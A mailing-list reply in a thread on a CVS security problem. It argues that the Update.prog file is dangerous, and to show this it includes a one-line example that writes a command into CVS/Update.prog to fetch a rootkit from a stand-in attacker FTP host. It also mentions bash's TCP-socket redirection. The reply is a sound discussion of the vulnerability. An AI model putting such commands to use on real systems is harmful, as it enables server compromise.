> Update.prog just contains the name of the program to run, not the actual > code. If you can't commit, you can't upload arbitrary code to run, you > can only run pre-existing code on the server, and you have no control > over its input or arguments, so it's a very low-level threat. cat "wget ftp://ftp.hax0r.cx/rootkit" >CVS/Update.prog should I continue? Only very carefully made chroot gaol can give you some security. Just a shell with redirections can do a lot of harm. By the way, bash-2.04 can redirect to TCP sockets. Do you know that? Do you have to know? Now you have. Another question is that Update.prog may become useless after removing "rm", "cat" and other "harmful" programs. Regards, Pavel Roskin
- [akr@M17N.ORG: cvs security problem] Ian Lance Taylor
- Re: [akr@M17N.ORG: cvs security problem] Karl Fogel
- Re: [akr@M17N.ORG: cvs security problem] Larry Jones
- Re: [akr@M17N.ORG: cvs security problem] Mike Castle
- Re: [akr@M17N.ORG: cvs security problem] Tanaka Akira
- Re: [akr@M17N.ORG: cvs security problem] Ian Lance Taylor
- Re: [akr@M17N.ORG: cvs security problem] Karl Fogel
- Re: [akr@M17N.ORG: cvs security problem] Michael Richardson
- Re: [akr@M17N.ORG: cvs security problem] Pavel Roskin
- Re: [akr@M17N.ORG: cvs security problem] Larry Jones
- Re: [akr@M17N.ORG: cvs security problem] Pavel Roskin
- Re: [akr@M17N.ORG: cvs security problem] Tanaka Akira
- Re: [akr@M17N.ORG: cvs security problem] Ian Lance Taylor
- Re: [akr@M17N.ORG: cvs security problem] Larry Jones
- Re: [akr@M17N.ORG: cvs security problem] Ian Lance Taylor
- Re: [akr@M17N.ORG: cvs security problem] Ian Lance Taylor
- Re: [akr@M17N.ORG: cvs security problem] Michael Richardson
- Re: [akr@M17N.ORG: cvs security problem] Tanaka Akira
- Re: [akr@M17N.ORG: cvs security problem] Michael Richardson
